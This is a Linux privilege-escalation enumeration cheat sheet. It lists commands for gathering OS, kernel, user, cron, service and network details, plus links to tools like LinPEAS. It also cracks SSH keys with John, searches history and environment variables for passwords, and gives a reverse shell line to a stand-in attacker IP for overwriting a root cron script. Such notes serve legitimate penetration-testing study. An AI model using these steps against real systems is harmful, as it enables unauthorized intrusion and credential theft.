Skip to content

Information gathering (linux)

Automated Enumeration Tools


  • LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
  • LinEnum: https://github.com/rebootuser/LinEnum
  • LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
  • Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
  • Linux Priv Checker: https://github.com/linted/linuxprivchecker
  • unix_privesc_check: https://pentestmonkey.net/tools/audit/unix-privesc-check

Host


hostname

System Information


OS info

Let's starting gaining some knowledge of the OS running

cat /etc/issue
cat /etc/*-release

Kernel version

uname -a
cat /proc/version
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz

Path

If you have written permissions on any folder inside the PATH variable you may be able to hijacking some libraries or binaries:

echo $PATH

Env info

Interesting information, passwords or API keys in the environment variables?

(env || set) 2>/dev/null

List Mounted Drives

cat /proc/mounts
mount
df -aTh
findmnt

Kernel exploits

Check the kernel version and if there is some exploit that can be used to escalate privileges

cat /proc/version
uname -a
searchsploit "Linux Kernel"

Useful software


Enumerate useful binaries

which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 python3.9 python3.10 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
Also, check if any compiler is installed. This is useful if you need to use some kernel exploit as it's recommended to compile it in the machine where you are going to use it (or in one similar)
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")

Vulnerable Software Installed

Check for the version of the installed packages and services. Maybe there is some old Nagios version (for example) that could be exploited for escalating privileges… It is recommended to check manually the version of the more suspicious installed software.

dpkg -l #Debian
rpm -qa #Centos
If you have SSH access to the machine you could also use openVAS to check for outdated and vulnerable software installed inside the machine.

Note that these commands will show a lot of information that will mostly be useless, therefore it's recommended some application like OpenVAS or similar that will check if any installed software version is vulnerable to known exploits

User


User Info

id
whoami
users
groups

Users

cat /etc/passwd

User history

history
cat /home/<user>/.bash_history
cat ~/.bash_history | less
cat ~/.mysql_history | less
cat ~/.nano_history | less
cat ~/.*history | less

Find file by name

find . -name flag.txt

Find file owned by user

find <directory-location> -user <username> -name <file-name> 2>/dev/null

Find file owned by a group

find <directory-location> -group <group-name> -name <file-name>  2>/dev/null

Find file owned by a group (executable)

find <directory-location> -executable -group <group-name>  2>/dev/null

Crack id_rsa

ssh2john id_rsa > id_rsa-hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa-hash

Cron


Cron Jobs - File Permissions

Check cron jobs configuration

cat /etc/crontab
ls -lah /etc/cron*
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
Check if you can overwrite script that are executed as root, for example
#!/bin/bash
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1

Cron Jobs - PATH Environment Variable

Check cron jobs configuration

cat /etc/crontab
Check PATH configuration, do you have access to any of paths, if yes try to create script there

Services


Service

sudo systemctl start apache2
sudo systemctl status apache2
sudo systemctl restart apache2
sudo systemctl stop apache2
sudo systemctl enable apache2 # autostart on boot time
systemctl list-unit-files # list all services

Service settings, there is any wrong allocation?

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/

Processes


List process

Take a look to what processes are being executed and check if any process has more privileges than it should (maybe a tomcat being executed by root?)

ps -A
ps axjf
ps aux

Installed Applications

application (debina)

dpkg -l

Readable/Writable Files and Directories

find / -writable -type d 2>/dev/null

Network


TCP/IP configuration

ip a
ifconfig -a
routing tables
/sbin/route
/sbin/routel
active network connections
ss -anp
netstat -antup
netstat -antpx
netstat -tulpn

Disks

mount
cat /etc/fstab
/bin/lsblk

Device Drivers and Kernel Modules

enumerate the loaded kernel modules

lsmod
use modinfo to find out more about the specific module
/sbin/modinfo libata